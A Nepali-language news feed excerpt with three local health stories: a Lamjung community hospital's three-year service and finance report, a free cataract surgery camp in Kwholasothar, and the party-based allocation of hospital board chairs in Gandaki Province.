राइनस, सुन्दरबजार र भानु नगरपालिकामा भएको सवारीसाधन दुर्घटनामा परेका ३५ जना घाइतेहरूको सफल उपचार गरिएको । नेपाल सरकारका स्वास्थ्य तथा जनसंख्या मन्त्री, लमजुंग जिल्लाका प्रमुख जिल्ला अधिकारी, प्रमुख सेनानी, प्रहरी प्रमुख, शसस्त्र प्रहरी प्रमुख, ईलाका प्रहरी प्रमुखहरु द्धारा अस्पतालको अनुगमन तथा निरीक्षण साथै अस्पतालमा स्वागत तथा परिचय कार्येक्रम गरिएको ।
STICHTING VRIENDEN VAN AAMPIPAL/FOR THE ONE को सहयोगमा अस्पतालमा कार्येरत मेडिकल कर्मचारीहरूको लागि Orthopedic Physiotherapy ECHO/Ultrasound सम्बन्धि १ दिने तालिम प्रदान गरिएको थियो ।
स्वास्थ्य तथा जनसंख्या मन्त्रालय काठमाडौँ, स्वास्थ्य निर्देशनालय पोखरा, स्वास्थ्य कार्येलय लमजुंग, स्वास्थ्य शाखा सु.न.पा. बाट अस्पतालको निरीक्षण तथा अनुगमन भएको ।
समुदाय गतिविधिहरूमा जिल्लाको विभिन्न पलिकहरूमा (सुन्दरबजार, दोर्दी, राईनस, क्व्होलासोथार)मा स्थानीय पालिका, वडा, युवा क्लब, आमा समूह, लमजुंग सेवा समिति हङकङ, नेपाली सेना संगको समन्वय र सहकार्यमा निशुल्क स्वास्थ्य शिबिर संचालन गरिएको छ । छिमेकी मानाङ जिल्ला, नासों गाउँपालिका– १ तालस्थित स्थानीय मस्र्याङ्दी युवा क्लबसँगको समन्वयमा स्थानीय जनप्रतिनिधि, विपद् व्यवस्थापन समिति सदस्यहरू, स्वास्थ्यकर्मी, सुरक्षाकर्मी, शिक्षक, समाजसेवी तथा युवा क्लबका सदस्यहरूलाई १ दिने प्राथमिक मनोसामाजिक सहयोग सम्बन्धी तालिम प्रदान गरियो । तालिममा ६५ जना सहभागी थिए ।
लमजुङ जिल्लामा नेपाली सेना, सशस्त्र प्रहरी, नेपाल प्रहरी र ज्म्ऋक्–नमुना सामुदायिक अस्पतालको संयुक्त आयोजनामा विपद् प्रतिकार्य सम्बन्धी अभ्यास कार्यक्रम गरिएको, ‘स्तनपानलाई प्राथमिकता दिऔँः सहयोगी वातावरण निर्माण गरौँ’ भन्ने नाराका साथ विश्व स्तनपान सप्ताह संचालन गरिएको थियो ।
यसैगरी, महिलाहरूको गर्भाशयको मुखको क्यान्सर सम्बन्धी निःशुल्क परीक्षण शिविर (VIA Screening Camp) सञ्चालन गरिएको साथै महिला स्वास्थ्य सम्बन्धी विशेष परामर्शमार्फत ३५ जना महिलाहरू लाभान्वित भएका थियो ।
‘ज्येष्ठ नागरिकसँग मनका कुरा’ कार्यक्रम निकै प्रभावकारी भएको पाइएको छ ।
निःशुल्क उपचार पाउने बिरामीहरूको संख्याः २२८५६ तीमध्ये महिला १३ हजार ४५३ जना र पुरुषहरू नौ हजार ४०३ छन्, यो विवरण तीन वर्षको हो अस्पतालका प्रमुख हेमन्त श्रेष्ठले बताउनु भएको छ । उहाँका अनुसार सो अस्पतालको तीन वर्षे सेवा अवधिमा निःशुल्क शिविर १४ वटा, बिरामी उपचार संख्या १० हजार २३० जना, आमा, बुवा, युवा समुहमा स्वास्थ्य कार्येक्रम अन्तरगत २६ जनालाई सेवा दिइएको छ भने लाभान्वित संख्या दुई हजार ९३५ रहेको छ ।
विद्यालय स्वास्थ्य कार्यक्रम २३ वटा, लाभान्वित विद्यार्थी संख्या पाँच हजार ९७० जना तथा अस्पतालबाट निःशुल्क उपचार पाउने संख्या तीन हजार ७३० जना रहेको उल्लेख छ ।
यसैगरी, आर्थिक विवरणतर्फ भौतिक संचरना निर्माण, मर्मत सम्भारमा भएको कुल खर्च छ लाख ४९ हजार ७७१ रुपैयाँ, मेडिकल उपकरण तथा फर्निचर खरिदको कुल खर्च ११ लाख ३३ हजार ३७२ रुपैयाँ, निःशुल्क कार्यक्रम खर्च एक करोड चार लाख ८९ हजार ५८१ रुपैयाँ रहेको छ ।
अस्पतालको नियमित खर्च (तलब, औषधि, मेडिकल सामग्री, गतष्ष्तिष्भक, मसलन्द खर्च तीन करोड ९६ लाख १४ हजार ४८४ रुपैयाँ खर्च भएको छ भने अस्पतालको कुल आन्तरिक आम्दानी तीन करोड ६२ लाख ७७ हजार ६३ रुपैयाँ रहेको जानकारी दिइएको थियो ।
उक्त अस्पतालबाट तीन वर्षको अवसधमा सेवा लिने कुल बिरामी संख्यामा बहिरंग सेवातर्फ ४८ हजार ८५० जना, अन्तरङ्ग सेवातर्फ दुई ३२० तथा आकस्मिक सेवा लिने संख्या आठ हजार ४६१ रहेको अस्पतालका प्रमुख हेमन्त श्रेष्ठले बताउनु भएको छ । उहाँका अनुसार निःशुल्क सेवा लिने संख्या २२ हजार ८५६ रहेको छ भने ल्याब सेवा लिने २१ हजार ६०१, एक्सरे सेवा १० हजार ६४६, ई.सि.जी. सेवा लिने एक हजार ८१ छन् भने दन्त सेवा लिने संख्या नौ हजार ५३५ रहेको छ । संक्षिप्तमा वर्तमानमा दैनिक ६०– ७० जना ओपिडी जाँच गर्न आएका छन् भने ७– ८ जना विरामी भर्ना हुने गरेको अस्पताल निर्देशक हेमन्त श्रेष्ठले बताउनु भयो । उहाँका अनुसार चार जना कन्सल्टेन्ट डाक्टर सहित ४० जना कर्मचारी कार्यरत रहेको छ ।
त्यस्तै शल्यक्रिया सेवा साधारणतर्फ पाच हजार ८३१ जनालाई र जटिल शल्यक्रिया सेवा २३ जनालाई गरिएको अस्पतालका प्रमुख श्रेष्ठले बताउनु भएको छ । उहाँका अनुसार तीन वर्षमा फिजियोथेरापी सेवा दुई हजार ३३३ जना, आँखा उपचार सेवा ३७४ जना, डेंगु सेवा २४१ जनालाई दिइएको छ भने रेबिज भ्याक्सिन सेवा लिने संख्या ३३९ रहेको छ । त्यस्तै, सर्पदंशको उपचार समेत ६५ जनादाई गरिएको छ । बिष सेवन गर्ने व्यक्ति १५ जनालाई सेवा दिएको अस्पतालले विषाक्त खाना (फूड पोइजन) भएका ५९ जनालाई सेवा दिएइको प्रगति विवरणमा उल्लेख छ ।
तीन वर्षमा मनोविमर्श सेवा दुई हजार ११८ जनालाई दिइएको अस्पतालका मनोपरामर्शदाता शोभा ठकुरीले बताउनु भयो ।
भावि योजनाहरूमा अस्पताललाई आत्मनिर्भर बनाउने रहेको छ । त्यस्तै, अधिकतम बिरामीहरूलाई गुणस्तरीय स्वास्थ्य सेवा प्रदान गर्ने, न्युनतम शुल्कमा Ceserean Section CS सेवा प्रवाह गर्ने, समुदाय स्वास्थ्य कार्यक्रम, निःशुल्क स्वास्थ्य शिविर, विद्यालय स्वास्थ्य, आमा–बा समूह, युथ क्लब, आश्रमहरूमा स्वास्थ्य सेवा प्रदान गर्ने, कर्मचारीहरूको लागि तालिम तथा शिप विकास, बिशेषज्ञ सेवाहरू थप गर्दै लैजाने, आधुनिक आवश्यक Ceserean Section CS medical उपकरणहरू खरिद गर्ने लगायत रहेको छ ।
अस्पताल व्यवस्थापन समितिका अध्यक्ष परमेश्वर अधिकारीको अध्यक्षतामा भएको कार्यक्रममा अस्पतालका मनोपरामर्शदाता शोभा ठकुरी, स्त्रीरोग विशेषज्ञ डा विजय शाह, डेण्टल सर्जन कञ्चन यादवलगायत जिल्ला स्थित सञ्चारकर्मीहरूको उपस्थिति रहेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37616 0
मोतियाविन्दूको निःशुल्क शल्यक्रिया शिविरमा ५४ जना लाभान्वित https://www.antaranganews.com/?p=37397 https://www.antaranganews.com/?p=37397#respond Tue, 23 Dec 2025 15:40:19 +0000 https://www.antaranganews.com/?p=37397 सिङ्दी(लमजुङ)– जिल्लाको उत्तर पश्चिम क्षेत्रमा रहेको क्व्होलासोथार गाउँपालिका– ५ को स्थानीय गाउँमा मोतियाबिन्दूको निःशुल्क शल्यक्रिया दुई दिने शिविर गरिएको छ । सो शिविरमा मोतियाविन्दूको समस्याबाट पीडित ५४ जनाको शल्यक्रिया शिविर प्ुस ७ गते सम्पन्न गरिएको हो ।
आँखा परीक्षण तथा मोतियाबिन्दूको निःशुल्क शल्यक्रिया शिविरमा ३२ जना महिला र २२ जना पुरुष गरी ५४ जनाको मोतिविन्दूको शल्याक्रिया गरिएको आयोजक क्व्होलासोथार गाउँपालिकाका स्वास्थ्य शाखा प्रमुख त्रिलोकचन्द्र गुरुङले बताउनु भयो । उहाँका अनुसार सो गाउँपालिकाले मुटु फाउन्डेशन नेपाल र मनोज एसोसिएसन फ्रान्सको व्यवस्थापन तथा हिमालय आँखा अस्पताल पोखराको प्राविधिक सहयोगमा मोतिबिन्दूको निःशुल्क शल्यक्रिया शिविरको आयोजना गरेको हो । उहाँले भन्नुभयो, ‘उक्त शिविरमा ६७२ जनाले आँखाका परीक्षण तथा उपचार सेवा लिएका छन् । जसमध्ये ३४४ महिला र ३२८ पुरुष थिए ।’
सो शिविर आधारभूत स्वास्थ्य सेवा केन्द्र सिङ्दीमा सञ्चालन गरिएको हो । आँखा परीक्षणको क्रममा मोतिविन्दूको समस्या देखिएका व्यक्तिहरूको शल्यक्रिया, औषधि वितरणसँगै नजिकैको वस्तु नदेख्ने समस्या भएकाहरूलाई ३ सय जनालाई चस्मा वितरण गरिएको थियो । लामो समयदेखि आँखामा समस्या भएका स्थानीयले गाउँमै शल्यक्रिया सहितको निःशुल्क सेवा पाएकोमा निकै खुसी व्यक्त गर्दै आफूहरूलाई शिविरले सहज भएको बताएका छन् ।
दुई दिने सो शिविरमा हिमालय आँखा अस्पतालका नेत्ररोग विशेषज्ञ डा. नारायणी रोक्का भट्टराईसहित प्राविधिक टीम र क्व्होलासोथार गाउँपालिकाका स्वास्थ्य शाखा प्रमुख त्रिलोकचन्द्र गुरुङ, राजु परियार, दिनेश विक, सल्मेभञ्ज्याङ स्वास्थ्य चौकी गिलुङका प्रमुख सन्तोष सुवेदी, पसगाउँ स्वास्थ्य चौकी प्रमुख मिलन रावत, घाम्राङ आधारभूत स्वास्थ्य सेवा केन्द्र प्रमुख गोपिनी गुरुङलगायत खटनु भएको थियो ।
सो शिविरको उद्घाटन गर्दै गाउँपालिका अध्यक्ष सूर्यप्रसाद गुरुङले गर्नु भएको हो । उहाँले दूरदराजका नागरिकलाई गाउँमै सेवा प्रदान गर्न सिङ्दीमा मोतिबिन्दूको शल्यक्रिया शिविर सञ्चालन गरिएको बताउनुभयो । उहाँले शिविरको व्यवस्थापन गर्ने संस्था मुटु फाउन्डेशन र प्राविधिक सहयोगी हिमालय आँखा अस्पताललाई धन्यवाद व्यक्त गर्नुभयो ।
त्यस्तै, यसअघि यस्तो शिविर सोही पालिका– ४ भुजुङमा पनि सञ्चालन गरिएको जानकारी अध्यक्ष गुरुङले दिनुभएको थियो ।
सो अवसरमा मुटु फाउन्डेशनका अध्यक्ष धनबहादुर गुरुङले शहरबाट टाढा रहेका, शहरमा पुगेर उपचार गर्न आर्थिकलगायत विभिन्न समस्या भएका नागरिकलाई सेवा दिन गाउँगाउँमा पुगेर आँखा परीक्षण कार्यसहित मोतिबिन्दको शल्यक्रिया शिविर सञ्चालन गर्न व्यवस्थापन गर्दै आएको उल्लेख गर्नुभयो । उहाँले यसअघि यसै जिल्लको दोर्दी, मस्र्याङ्दी गाउँपालिकामा पनि मोतिबिन्दूको निःशुल्क शल्यक्रिया शिविर सञ्चालन गरेको र आगामी दिनमा यसप्रकारका सेवाहरूलाई निरन्तर सहयोग गर्दै जाने जानकारी दिनुभयो ।
हिमालय आँखा अस्पताल पोखराका नेत्र अधिकृत गोविन्दनाथ योगीले गाउँघर, दूरदराजमा आयोजना गरिने यस्ता शिविरमा हिमालय आँखा अस्पतालले विगतदेखि नै प्राविधिक सेवा प्रदान गर्दै आएको र यसप्रकारको सेवाबाट आर्थिक अभावले वा विभिन्न कारणले शहरसम्म पुगेर आँखाको उपचार गर्न असमर्थ भएका नागरिक लाभान्वित भएको बताउनुभयो ।
त्यस्तै, क्व्होलासोथार गाउँपालिका– ५ का वडाअध्यक्ष गीतबहादुर गुरुङको अध्यक्षता तथा गाउँपालिका स्वास्थ्य शाखा प्रमुख त्रिलोकचन्द्र गुरुङले स्वागत मन्तव्य राख्नुभएको कार्यक्रमको सञ्चालन आधारभूत स्वास्थ्य सेवा केन्द्र सिङ्दीका प्रमुख बिन्तीमाया गुरुङले गर्नुभएको थियो ।
उक्त शिविरको पहिलो दिन ३ सय ५५ जनाले सेवा लिएका छन् । पहिलो दिन वडा नं. ६, ७ र ८ का २८ जनाको मोतिबिन्दूको शल्यक्रिया गरिएको छ । शिविरमा २ सय १७ वटा चश्मा, औषधी लगायत वितरण गरिएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37397 0
गण्डकी प्रदेशका ११ जिल्लाका अस्पतालमा कांग्रेस र एमालेले गरे भागबण्डा https://www.antaranganews.com/?p=37133 https://www.antaranganews.com/?p=37133#respond Tue, 09 Dec 2025 15:22:16 +0000 https://www.antaranganews.com/?p=37133 पोखरा– गण्डकी प्रदेशका ११ अस्पतालमा कांग्रेस र एमालेले भागबण्डा गरेका छन् । गण्डकी प्रदेश सरकारले मातहतका ११ वटा जिल्ला सदरमुकाममा रहेका अस्पतालमा भागवण्डामा नयाँ व्यवस्थापन समिति मंसिर २३ गते गठन गरेको हो ।
जसमा सरकारको नेतृत्व गरेको कांग्रेसले ६ जिल्ला र सत्ताको साझेदार भएको फाइदा उठाउँदै एमाले ५ जना अध्यक्ष पद लिइ नियुक्ति समेत दिएका छन् । सरकारले बनाएको नयाँ गठन आदेशअनुसार एक सय शय्याको अस्पतालमा स्नातक तह उत्तीर्ण भई सम्बन्धित जिल्लामा स्थायी बसोबास गर्ने व्यक्तिलाई अध्यक्ष नियुक्त गर्ने व्यवस्था छ ।
नै सदस्यीय हुने यस्ता समितिका सदस्यहरूमा अस्पताल रहेको स्थानीय तहको प्रमुख वा निजले तोकेको कार्यपालिका सदस्य, कम्तीमा स्नातक तह उत्तीर्ण सम्बन्धित जिल्लाको व्यक्तिबाट मन्त्रालयले मनोनीत गरेको एक महिलासहित दुई जना, जिल्ला प्रशासन कार्यालय, प्रदेश लेखा नियन्त्रक कार्यालय वा कोष तथा लेखा नियन्त्रक कार्यालयको अधिकृत प्रतिनिधि, समितिले मनोनित गरेको अस्पतालमा कार्यरत स्थायी विशेषज्ञ चिकित्सकबाट एकजना, अस्पतालको नर्सिङ प्रमुखका साथै सदस्य सचिवका रूपमा मेडिकल सुपरिन्टेन्डेन्ट रहने प्रवन्ध छ ।
समग्रमा, नयाँ गठन आदेशअनुसार एक सय शय्याका, ५० शय्याका र २५ शय्याका अस्पतालमा समिति गठनका लागि योग्यता निर्धारण गरिएको छ ।
सो सहमति अनुसार कांग्रेसले मध्यबिन्दु, लमजुङ, दमौली, पर्वत, मुस्ताङ र बुर्तिबाङ अस्पताल तथा एमालेले धौलागिरी अस्पताल, बेनी, मनाङ, स्याङ्जा र लेखनाथको जनरल तथा सरुवा रोग अस्पतालको नेतृत्व लिने काम भएको छ ।
मन्त्री परिषद् बैठकले सो सहमति अनुसार एकैपटक ११ वटै अस्पतालमा व्यवस्थापन समिति गठन गरेको हो । जसअनुसार लेखनाथस्थित जनरल तथा सरुवा रोग अस्पतालमा ऋषिराज जमरकट्टेल, धौलागिरी प्रादेशिक अस्पताल बागलुङमा श्रीप्रसाद शर्मा, दमौली अस्पतालमा कमलामोहन वाग्ले, बागलुङको बुर्तिबाङ अस्पतालमा कमल भुसाल, पर्वत अस्पतालमा यामबहादुर नेपाली र बागलुङमा श्रीप्रसाद शर्मालाई अध्यक्ष नियुक्त गरिएको सरकारका प्रवक्ता डा. टकराज गुरुङले जानकारी दिनुभयो । उहाँका अनुसार प्रदेश अस्पताल लमजुङमा विजय गुरुङ, बेनी अस्पतालमा डेकबहादुर बानियाँ, मध्यबिन्दु अस्पतालमा बालकृष्ण घिमिरे, मुस्ताङ अस्पतालमा तेन्जिङ थकाली, स्याङ्जा अस्पतालमा दिलकुमार भुजेल र मनाङ अस्पतालमा अर्विन गुरुङ नियुक्त हुनु भएको छ ।
प्रदेश सरकारमातहत हाल १४ वटा अस्पताल र २ वटा आयुर्वेद अस्पताल छन् ।
यसैगरी, ५० शय्याको अस्पतालमा स्नातक तह उत्तीर्ण भई सम्बन्धित जिल्लामा स्थायी बसोबास गर्ने व्यक्ति अध्यक्ष हुनेछन्, यसमा नौ सदस्यीय समिति गठन हुनेछ, जसका सदस्यहरूमा प्रवीणता प्रमाणपत्र तह उत्तीर्ण व्यक्तिमध्ये १ महिलासहित २ जना रहनेछन् ।
२५ शय्यासम्मका अस्पतालमा सम्बन्धित जिल्लामा स्थायी बसोबास गर्ने व्यक्तिबाट प्रदेश सरकारले मनोनीत गरेको व्यक्ति अध्यक्ष हुने व्यवस्था छ । यसका सदस्यहरू मन्त्रालयले तोकेका व्यक्तिहरू हुने सो कार्यविधिमा उल्लेख छ ।
मन्त्रिपरिषद् बैठकले जेनजी आन्दोलनका क्रममा तोडफोड र आगजनी भई प्रयोगमा ल्याउन नमिल्ने भवनहरूको अनुमानित लागत तयार गर्न परामर्श सेवा लिने निर्णय गरेको छ । यसअघि भौतिक पूर्वाधार विकास मन्त्रालयले प्राविधिकहरू खटाएर क्षति मूल्यांकन गरेको प्रवक्ता गुरुङले जानकारी दिनु भयो । उहाँका अनुसार जलेका भवनहरूलाई तीन प्रकारमा विभाजन गरिएको छः हरियो स्टिकर भएका भवनहरूको मर्मत गरी सेवा सञ्चालन भइसकेको छ । रातो र पहेंलो प्रकृतिका भवनहरूको पुनर्निर्माण गर्न लाग्ने खर्चको विवरण तयार गर्न परामर्श सेवा लिने तयारी गरिएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37133 0